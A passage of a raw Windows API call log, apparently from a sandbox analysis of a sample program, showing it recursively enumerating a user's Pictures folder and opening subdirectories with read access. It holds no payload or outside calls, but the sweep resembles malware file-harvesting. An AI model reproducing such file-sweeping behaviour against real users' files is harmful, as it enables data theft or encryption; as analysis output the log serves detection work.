dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8fecc0 [0256.762] FindNextFileW (in: hFindFile=0x8fecc0, lpFindFileData=0x123a3670 | out: lpFindFileData=0x123a3670*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2b1a6533, ftCreationTime.dwHighDateTime=0x1d70504, ftLastAccessTime.dwLowDateTime=0x2b1a6533, ftLastAccessTime.dwHighDateTime=0x1d70504, ftLastWriteTime.dwLowDateTime=0x2b1a6533, ftLastWriteTime.dwHighDateTime=0x1d70504, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0256.762] FindNextFileW (in: hFindFile=0x8fecc0, lpFindFileData=0x123a3670 | out: lpFindFileData=0x123a3670*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x2b1a6533, ftCreationTime.dwHighDateTime=0x1d70504, ftLastAccessTime.dwLowDateTime=0x2b1a6533, ftLastAccessTime.dwHighDateTime=0x1d70504, ftLastWriteTime.dwLowDateTime=0x2b1a6533, ftLastWriteTime.dwHighDateTime=0x1d70504, nFileSizeHigh=0x0, nFileSizeLow=0xbe, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0256.762] FindNextFileW (in: hFindFile=0x8fecc0, lpFindFileData=0x123a3670 | out: lpFindFileData=0x123a3670*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0256.762] FindClose (in: hFindFile=0x8fecc0 | out: hFindFile=0x8fecc0) returned 1 [0256.763] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0256.763] FindFirstFileW (in: lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\*", lpFindFileData=0x123a35f0 | out: lpFindFileData=0x123a35f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x83cd30f0, ftCreationTime.dwHighDateTime=0x1d822b4, ftLastAccessTime.dwLowDateTime=0x9b404010, ftLastAccessTime.dwHighDateTime=0x1d82a02, ftLastWriteTime.dwLowDateTime=0x9b404010, ftLastWriteTime.dwHighDateTime=0x1d82a02, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8fea80 [0256.763] FindNextFileW (in: hFindFile=0x8fea80, lpFindFileData=0x123a3670 | out: lpFindFileData=0x123a3670*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x83cd30f0, ftCreationTime.dwHighDateTime=0x1d822b4, ftLastAccessTime.dwLowDateTime=0x9b404010, ftLastAccessTime.dwHighDateTime=0x1d82a02, ftLastWriteTime.dwLowDateTime=0x9b404010, ftLastWriteTime.dwHighDateTime=0x1d82a02, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0256.763] FindNextFileW (in: hFindFile=0x8fea80, lpFindFileData=0x123a3670 | out: lpFindFileData=0x123a3670*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2cec0610, ftCreationTime.dwHighDateTime=0x1d81bd1, ftLastAccessTime.dwLowDateTime=0x3bc4db0, ftLastAccessTime.dwHighDateTime=0x1d81fdf, ftLastWriteTime.dwLowDateTime=0x3bc4db0, ftLastWriteTime.dwHighDateTime=0x1d81fdf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="EL7ncsIzIojJ _a9Ks", cAlternateFileName="EL7NCS~1")) returned 1 [0256.763] FindNextFileW (in: hFindFile=0x8fea80, lpFindFileData=0x123a3670 | out: lpFindFileData=0x123a3670*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd7f1ec0, ftCreationTime.dwHighDateTime=0x1d821e6, ftLastAccessTime.dwLowDateTime=0x9a97a4c0, ftLastAccessTime.dwHighDateTime=0x1d82825, ftLastWriteTime.dwLowDateTime=0x9a97a4c0, ftLastWriteTime.dwHighDateTime=0x1d82825, nFileSizeHigh=0x0, nFileSizeLow=0x18d92, dwReserved0=0x0, dwReserved1=0x0, cFileName="KpKdn6T4M.bmp", cAlternateFileName="KPKDN6~1.BMP")) returned 1 [0256.763] FindNextFileW (in: hFindFile=0x8fea80, lpFindFileData=0x123a3670 | out: lpFindFileData=0x123a3670*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49ec1160, ftCreationTime.dwHighDateTime=0x1d829a5, ftLastAccessTime.dwLowDateTime=0x9b4bf0f0, ftLastAccessTime.dwHighDateTime=0x1d829e3, ftLastWriteTime.dwLowDateTime=0x9b4bf0f0, ftLastWriteTime.dwHighDateTime=0x1d829e3, nFileSizeHigh=0x0, nFileSizeLow=0x7d61, dwReserved0=0x0, dwReserved1=0x0, cFileName="RnC1I6fkRVRS9W.png", cAlternateFileName="RNC1I6~1.PNG")) returned 1 [0256.763] FindNextFileW (in: hFindFile=0x8fea80, lpFindFileData=0x123a3670 | out: lpFindFileData=0x123a3670*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0256.763] FindClose (in: hFindFile=0x8fea80 | out: hFindFile=0x8fea80) returned 1 [0256.763] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0256.764] FindFirstFileW (in: lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\*", lpFindFileData=0x123a34e0 | out: lpFindFileData=0x123a34e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2cec0610, ftCreationTime.dwHighDateTime=0x1d81bd1, ftLastAccessTime.dwLowDateTime=0x3bc4db0, ftLastAccessTime.dwHighDateTime=0x1d81fdf, ftLastWriteTime.dwLowDateTime=0x3bc4db0, ftLastWriteTime.dwHighDateTime=0x1d81fdf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8fecc0 [0256.764] FindNextFileW (in: hFindFile=0x8fecc0, lpFindFileData=0x123a3560 | out: lpFindFileData=0x123a3560*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2cec0610, ftCreationTime.dwHighDateTime=0x1d81bd1, ftLastAccessTime.dwLowDateTime=0x3bc4db0, ftLastAccessTime.dwHighDateTime=0x1d81fdf, ftLastWriteTime.dwLowDateTime=0x3bc4db0, ftLastWriteTime.dwHighDateTime=0x1d81fdf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0256.764] FindNextFileW (in: hFindFile=0x8fecc0, lpFindFileData=0x123a3560 | out: lpFindFileData=0x123a3560*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x732492a0, ftCreationTime.dwHighDateTime=0x1d82824, ftLastAccessTime.dwLowDateTime=0x9f3f1d10, ftLastAccessTime.dwHighDateTime=0x1d82883, ftLastWriteTime.dwLowDateTime=0x9f3f1d10, ftLastWriteTime.dwHighDateTime=0x1d82883, nFileSizeHigh=0x0, nFileSizeLow=0x13ff4, dwReserved0=0x0, dwReserved1=0x0, cFileName="CL8lPpx69.png", cAlternateFileName="CL8LPP~1.PNG")) returned 1 [0256.764] FindNextFileW (in: hFindFile=0x8fecc0, lpFindFileData=0x123a3560 | out: lpFindFileData=0x123a3560*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x77088e10, ftCreationTime.dwHighDateTime=0x1d81a43, ftLastAccessTime.dwLowDateTime=0x431de0f0, ftLastAccessTime.dwHighDateTime=0x1d81cf0, ftLastWriteTime.dwLowDateTime=0x431de0f0, ftLastWriteTime.dwHighDateTime=0x1d81cf0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="j5yJ", cAlternateFileName="")) returned 1 [0256.764] FindNextFileW (in: hFindFile=0x8fecc0, lpFindFileData=0x123a3560 | out: lpFindFileData=0x123a3560*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0fd43e0, ftCreationTime.dwHighDateTime=0x1d82309, ftLastAccessTime.dwLowDateTime=0x86947a50, ftLastAccessTime.dwHighDateTime=0x1d82390, ftLastWriteTime.dwLowDateTime=0x86947a50, ftLastWriteTime.dwHighDateTime=0x1d82390, nFileSizeHigh=0x0, nFileSizeLow=0x72c7, dwReserved0=0x0, dwReserved1=0x0, cFileName="LY6q.bmp", cAlternateFileName="")) returned 1 [0256.764] FindNextFileW (in: hFindFile=0x8fecc0, lpFindFileData=0x123a3560 | out: lpFindFileData=0x123a3560*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6fe9cba0, ftCreationTime.dwHighDateTime=0x1d81eb0, ftLastAccessTime.dwLowDateTime=0xe873930, ftLastAccessTime.dwHighDateTime=0x1d826ec, ftLastWriteTime.dwLowDateTime=0xe873930, ftLastWriteTime.dwHighDateTime=0x1d826ec, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MgwF6NEdCmu8wRMced1", cAlternateFileName="MGWF6N~1")) returned 1 [0256.764] FindNextFileW (in: hFindFile=0x8fecc0, lpFindFileData=0x123a3560 | out: lpFindFileData=0x123a3560*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x397be4f0, ftCreationTime.dwHighDateTime=0x1d82611, ftLastAccessTime.dwLowDateTime=0xa074a5e0, ftLastAccessTime.dwHighDateTime=0x1d826cd, ftLastWriteTime.dwLowDateTime=0xa074a5e0, ftLastWriteTime.dwHighDateTime=0x1d826cd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="tX9_ewqicQ_n-v", cAlternateFileName="TX9_EW~1")) returned 1 [0256.764] FindNextFileW (in: hFindFile=0x8fecc0, lpFindFileData=0x123a3560 | out: lpFindFileData=0x123a3560*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4f946b0, ftCreationTime.dwHighDateTime=0x1d82413, ftLastAccessTime.dwLowDateTime=0x2e6270, ftLastAccessTime.dwHighDateTime=0x1d82997, ftLastWriteTime.dwLowDateTime=0x2e6270, ftLastWriteTime.dwHighDateTime=0x1d82997, nFileSizeHigh=0x0, nFileSizeLow=0x72e4, dwReserved0=0x0, dwReserved1=0x0, cFileName="uf6wQ63liri5t-.png", cAlternateFileName="UF6WQ6~1.PNG")) returned 1 [0256.764] FindNextFileW (in: hFindFile=0x8fecc0, lpFindFileData=0x123a3560 | out: lpFindFileData=0x123a3560*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25ed7470, ftCreationTime.dwHighDateTime=0x1d829c3, ftLastAccessTime.dwLowDateTime=0xb2e3d740, ftLastAccessTime.dwHighDateTime=0x1d82a0c, ftLastWriteTime.dwLowDateTime=0xb2e3d740, ftLastWriteTime.dwHighDateTime=0x1d82a0c, nFileSizeHigh=0x0, nFileSizeLow=0xd47, dwReserved0=0x0, dwReserved1=0x0, cFileName="Xhgh4LkdSysSXjg.png", cAlternateFileName="XHGH4L~1.PNG")) returned 1 [0256.764] FindNextFileW (in: hFindFile=0x8fecc0, lpFindFileData=0x123a3560 | out: lpFindFileData=0x123a3560*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0256.764] FindClose (in: hFindFile=0x8fecc0 | out: hFindFile=0x8fecc0) returned 1 [0256.764] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\MgwF6NEdCmu8wRMced1" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\mgwf6nedcmu8wrmced1"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0256.765] FindFirstFileW (in: lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\MgwF6NEdCmu8wRMced1\\*", lpFindFileData=0x123a33d0 | out: lpFindFileData=0x123a33d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6fe9cba0, ftCreationTime.dwHighDateTime=0x1d81eb0, ftLastAccessTime.dwLowDateTime=0xe873930, ftLastAccessTime.dwHighDateTime=0x1d826ec, ftLastWriteTime.dwLowDateTime=0xe873930, ftLastWriteTime.dwHighDateTime=0x1d826ec, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8fedc0 [0256.765] FindNextFileW (in: hFindFile=0x8fedc0, lpFindFileData=0x123a3450 | out: lpFindFileData=0x123a3450*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6fe9cba0, ftCreationTime.dwHighDateTime=0x1d81eb0, ftLastAccessTime.dwLowDateTime=0xe873930, ftLastAccessTime.dwHighDateTime=0x1d826ec, ftLastWriteTime.dwLowDateTime=0xe873930, ftLastWriteTime.dwHighDateTime=0x1d826ec, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0256.765] FindNextFileW (in: hFindFile=0x8fedc0, lpFindFileData=0x123a3450 | out: lpFindFileData=0x123a3450*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc03405b0, ftCreationTime.dwHighDateTime=0x1d82010, ftLastAccessTime.dwLowDateTime=0x8a201720, ftLastAccessTime.dwHighDateTime=0x1d82777, ftLastWriteTime.dwLowDateTime=0x8a201720, ftLastWriteTime.dwHighDateTime=0x1d82777, nFileSizeHigh=0x0, nFileSizeLow=0x127a1, dwReserved0=0x0, dwReserved1=0x0, cFileName="1MwQ46yFzkmbDV8forC.png", cAlternateFileName="1MWQ46~1.PNG")) returned 1 [0256.765] FindNextFileW (in: hFindFile=0x8fedc0, lpFindFileData=0x123a3450 | out: lpFindFileData=0x123a3450*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x39d8ae30, ftCreationTime.dwHighDateTime=0x1d8206f, ftLastAccessTime.dwLowDateTime=0xee8aacc0, ftLastAccessTime.dwHighDateTime=0x1d82349, ftLastWriteTime.dwLowDateTime=0xee8aacc0, ftLastWriteTime.dwHighDateTime=0x1d82349, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bOgs768mC0sZS6u", cAlternateFileName="BOGS76~1")) returned 1 [0256.765] FindNextFileW (in: hFindFile=0x8fedc0, lpFindFileData=0x123a3450 | out: lpFindFileData=0x123a3450*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf359f1b0, ftCreationTime.dwHighDateTime=0x1d81daf, ftLastAccessTime.dwLowDateTime=0xb990480, ftLastAccessTime.dwHighDateTime=0x1d820fa, ftLastWriteTime.dwLowDateTime=0xb990480, ftLastWriteTime.dwHighDateTime=0x1d820fa, nFileSizeHigh=0x0, nFileSizeLow=0x9908, dwReserved0=0x0, dwReserved1=0x0, cFileName="cYwVCtVRJNlamU.bmp", cAlternateFileName="CYWVCT~1.BMP")) returned 1 [0256.765] FindNextFileW (in: hFindFile=0x8fedc0, lpFindFileData=0x123a3450 | out: lpFindFileData=0x123a3450*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x938f7a40, ftCreationTime.dwHighDateTime=0x1d8219f, ftLastAccessTime.dwLowDateTime=0x6ff31900, ftLastAccessTime.dwHighDateTime=0x1d828f9, ftLastWriteTime.dwLowDateTime=0x6ff31900, ftLastWriteTime.dwHighDateTime=0x1d828f9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Dju4ZgDG1-unlMg", cAlternateFileName="DJU4ZG~1")) returned 1 [0256.765] FindNextFileW (in: hFindFile=0x8fedc0, lpFindFileData=0x123a3450 | out: lpFindFileData=0x123a3450*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf20acd70, ftCreationTime.dwHighDateTime=0x1d81e54, ftLastAccessTime.dwLowDateTime=0xda720750, ftLastAccessTime.dwHighDateTime=0x1d8209d, ftLastWriteTime.dwLowDateTime=0xda720750, ftLastWriteTime.dwHighDateTime=0x1d8209d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zOpDqT28-XSK3u", cAlternateFileName="ZOPDQT~1")) returned 1 [0256.765] FindNextFileW (in: hFindFile=0x8fedc0, lpFindFileData=0x123a3450 | out: lpFindFileData=0x123a3450*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0256.765] FindClose (in: hFindFile=0x8fedc0 | out: hFindFile=0x8fedc0) returned 1 [0256.766] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\MgwF6NEdCmu8wRMced1\\Dju4ZgDG1-unlMg" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\mgwf6nedcmu8wrmced1\\dju4zgdg1-unlmg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0256.766] FindFirstFileW (in: lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\MgwF6NEdCmu8wRMced1\\Dju4ZgDG1-unlMg\\*", lpFindFileData=0x123a32c0 | out: lpFindFileData=0x123a32c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x938f7a40, ftCreationTime.dwHighDateTime=0x1d8219f, ftLastAccessTime.dwLowDateTime=0x6ff31900, ftLastAccessTime.dwHighDateTime=0x1d828f9, ftLastWriteTime.dwLowDateTime=0x6ff31900, ftLastWriteTime.dwHighDateTime=0x1d828f9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8feac0 [0256.766] FindNextFileW (in: hFindFile=0x8feac0, lpFindFileData=0x123a3340 | out: lpFindFileData=0x123a3340*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x938f7a40, ftCreationTime.dwHighDateTime=0x1d8219f, ftLastAccessTime.dwLowDateTime=0x6ff31900, ftLastAccessTime.dwHighDateTime=0x1d828f9, ftLastWriteTime.dwLowDateTime=0x6ff31900, ftLastWriteTime.dwHighDateTime=0x1d828f9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0256.766] FindNextFileW (in: hFindFile=0x8feac0, lpFindFileData=0x123a3340 | out: lpFindFileData=0x123a3340*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe993bd0, ftCreationTime.dwHighDateTime=0x1d819e5, ftLastAccessTime.dwLowDateTime=0xd6b9ff90, ftLastAccessTime.dwHighDateTime=0x1d82607, ftLastWriteTime.dwLowDateTime=0xd6b9ff90, ftLastWriteTime.dwHighDateTime=0x1d82607, nFileSizeHigh=0x0, nFileSizeLow=0x2344, dwReserved0=0x0, dwReserved1=0x0, cFileName="8IVRLBXd.jpg", cAlternateFileName="")) returned 1 [0256.766] FindNextFileW (in: hFindFile=0x8feac0, lpFindFileData=0x123a3340 | out: lpFindFileData=0x123a3340*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c09470, ftCreationTime.dwHighDateTime=0x1d8233e, ftLastAccessTime.dwLowDateTime=0x98a3f4d0, ftLastAccessTime.dwHighDateTime=0x1d82856, ftLastWriteTime.dwLowDateTime=0x98a3f4d0, ftLastWriteTime.dwHighDateTime=0x1d82856, nFileSizeHigh=0x0, nFileSizeLow=0x5dc, dwReserved0=0x0, dwReserved1=0x0, cFileName="A3FeS_cred _Q.bmp", cAlternateFileName="A3FES_~1.BMP")) returned 1 [0256.766] FindNextFileW (in: hFindFile=0x8feac0, lpFindFileData=0x123a3340 | out: lpFindFileData=0x123a3340*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x621ed650, ftCreationTime.dwHighDateTime=0x1d82527, ftLastAccessTime.dwLowDateTime=0xc19fb8b0, ftLastAccessTime.dwHighDateTime=0x1d82829, ftLastWriteTime.dwLowDateTime=0xc19fb8b0, ftLastWriteTime.dwHighDateTime=0x1d82829, nFileSizeHigh=0x0, nFileSizeLow=0x217f, dwReserved0=0x0, dwReserved1=0x0, cFileName="pfXi8.bmp", cAlternateFileName="")) returned 1 [0256.766] FindNextFileW (in: hFindFile=0x8feac0, lpFindFileData=0x123a3340 | out: lpFindFileData=0x123a3340*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7cea1450, ftCreationTime.dwHighDateTime=0x1d81b62, ftLastAccessTime.dwLowDateTime=0xb73fd750, ftLastAccessTime.dwHighDateTime=0x1d81ee8, ftLastWriteTime.dwLowDateTime=0xb73fd750, ftLastWriteTime.dwHighDateTime=0x1d81ee8, nFileSizeHigh=0x0, nFileSizeLow=0x13251, dwReserved0=0x0, dwReserved1=0x0, cFileName="Qp2s6QL8pHTr dp7.gif", cAlternateFileName="QP2S6Q~1.GIF")) returned 1 [0256.766] FindNextFileW (in: hFindFile=0x8feac0, lpFindFileData=0x123a3340 | out: lpFindFileData=0x123a3340*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0256.767] FindClose (in: hFindFile=0x8feac0 | out: hFindFile=0x8feac0) returned 1 [0256.768] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\MgwF6NEdCmu8wRMced1\\bOgs768mC0sZS6u" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\mgwf6nedcmu8wrmced1\\bogs768mc0szs6u"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0256.768] FindFirstFileW (in: lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\MgwF6NEdCmu8wRMced1\\bOgs768mC0sZS6u\\*", lpFindFileData=0x123a32c0 | out: lpFindFileData=0x123a32c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x39d8ae30, ftCreationTime.dwHighDateTime=0x1d8206f, ftLastAccessTime.dwLowDateTime=0xee8aacc0, ftLastAccessTime.dwHighDateTime=0x1d82349, ftLastWriteTime.dwLowDateTime=0xee8aacc0, ftLastWriteTime.dwHighDateTime=0x1d82349, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8fe980 [0256.768] FindNextFileW (in: hFindFile=0x8fe980, lpFindFileData=0x123a3340 | out: lpFindFileData=0x123a3340*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x39d8ae30, ftCreationTime.dwHighDateTime=0x1d8206f, ftLastAccessTime.dwLowDateTime=0xee8aacc0, ftLastAccessTime.dwHighDateTime=0x1d82349, ftLastWriteTime.dwLowDateTime=0xee8aacc0, ftLastWriteTime.dwHighDateTime=0x1d82349, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0256.768] FindNextFileW (in: hFindFile=0x8fe980, lpFindFileData=0x123a3340 | out: lpFindFileData=0x123a3340*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x536f0760, ftCreationTime.dwHighDateTime=0x1d8274d, ftLastAccessTime.dwLowDateTime=0xfbdfe000, ftLastAccessTime.dwHighDateTime=0x1d828be, ftLastWriteTime.dwLowDateTime=0xfbdfe000, ftLastWriteTime.dwHighDateTime=0x1d828be, nFileSizeHigh=0x0, nFileSizeLow=0x22f5, dwReserved0=0x0, dwReserved1=0x0, cFileName="6b9NjMSdcI.png", cAlternateFileName="6B9NJM~1.PNG")) returned 1 [0256.768] FindNextFileW (in: hFindFile=0x8fe980, lpFindFileData=0x123a3340 | out: lpFindFileData=0x123a3340*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5fb37d80, ftCreationTime.dwHighDateTime=0x1d8290a, ftLastAccessTime.dwLowDateTime=0xcce817d0, ftLastAccessTime.dwHighDateTime=0x1d82973, ftLastWriteTime.dwLowDateTime=0xcce817d0, ftLastWriteTime.dwHighDateTime=0x1d82973, nFileSizeHigh=0x0, nFileSizeLow=0x18f14, dwReserved0=0x0, dwReserved1=0x0, cFileName="HhFJJPltLaMuNl.png", cAlternateFileName="HHFJJP~1.PNG")) returned 1 [0256.768] FindNextFileW (in: hFindFile=0x8fe980, lpFindFileData=0x123a3340 | out: lpFindFileData=0x123a3340*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9ca21040, ftCreationTime.dwHighDateTime=0x1d81d9c, ftLastAccessTime.dwLowDateTime=0xed2397e0, ftLastAccessTime.dwHighDateTime=0x1d823e7, ftLastWriteTime.dwLowDateTime=0xed2397e0, ftLastWriteTime.dwHighDateTime=0x1d823e7, nFileSizeHigh=0x0, nFileSizeLow=0x4b13, dwReserved0=0x0, dwReserved1=0x0, cFileName="JFXeWTcsVuNh u.bmp", cAlternateFileName="JFXEWT~1.BMP")) returned 1 [0256.768] FindNextFileW (in: hFindFile=0x8fe980, lpFindFileData=0x123a3340 | out: lpFindFileData=0x123a3340*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0256.769] FindClose (in: hFindFile=0x8fe980 | out: hFindFile=0x8fe980) returned 1 [0256.769] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\MgwF6NEdCmu8wRMced1\\zOpDqT28-XSK3u" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\mgwf6nedcmu8wrmced1\\zopdqt28-xsk3u"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0256.770] FindFirstFileW (in: 